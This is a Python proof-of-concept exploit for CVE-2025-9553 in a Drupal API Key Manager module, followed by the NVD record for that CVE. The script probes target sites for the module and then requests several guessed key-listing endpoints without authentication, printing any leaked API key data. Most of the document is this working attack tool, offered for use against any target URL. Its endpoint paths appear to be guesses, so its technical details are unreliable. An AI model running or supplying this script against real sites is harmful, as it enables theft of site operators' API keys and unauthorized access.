CVE-2025-9553

# CVE-2025-9553 - Drupal API Key Manager Information Disclosure PoC # Author: Security Researcher # Description: Exploits missing access control in Drupal API Key Manager module import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-drupal-site.com" # Step 1: Detect if API Key Manager module is installed def detect_module(base_url): """Check if the API Key Manager module is installed on the target Drupal site.""" detection_paths = [ "/admin/config/services/api-key-manager", "/api-key-manager", "/admin/structure/api-key-manager" ] for path in detection_paths: url = f"{base_url}{path}" try: resp = requests.get(url, timeout=10, allow_redirects=False) if resp.status_code == 200 and "api-key" in resp.text.lower(): print(f"[+] Module detected at: {url}") return True except requests.RequestException: continue return False # Step 2: Exploit the information disclosure vulnerability def exploit_info_disclosure(base_url): """Attempt to retrieve API key information without authentication.""" exploit_paths = [ "/admin/config/services/api-key-manager/list", "/api-key-manager/list?_format=json", "/admin/config/services/api-key-manager/keys" ] for path in exploit_paths: url = f"{base_url}{path}" try: resp = requests.get(url, timeout=10) if resp.status_code == 200: print(f"[+] Potential info disclosure at: {url}") print(f"[+] Response snippet: {resp.text[:500]}") return resp.text except requests.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print(f"[*] Target: {TARGET_URL}") if detect_module(TARGET_URL): print("[*] Attempting to exploit information disclosure...") result = exploit_info_disclosure(TARGET_URL) if result: print("[+] Exploitation completed. Review the leaked data above.") else: print("[-] Exploitation did not yield results.") else: print("[-] API Key Manager module not detected on target.")

{"cve": {"id": "CVE-2025-9553", "sourceIdentifier": "[email protected]", "published": "2025-10-10T23:15:37.523", "lastModified": "2025-12-05T00:45:51.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Drupal API Key manager.This issue affects API Key manager: *.*."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:api_key_manager_project:api_key_manager:*:*:*:*:*:drupal:*:*", "matchCriteriaId": "A01FE7CA-D3EC-4A45-9796-EDDF045882B6"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2025-103", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}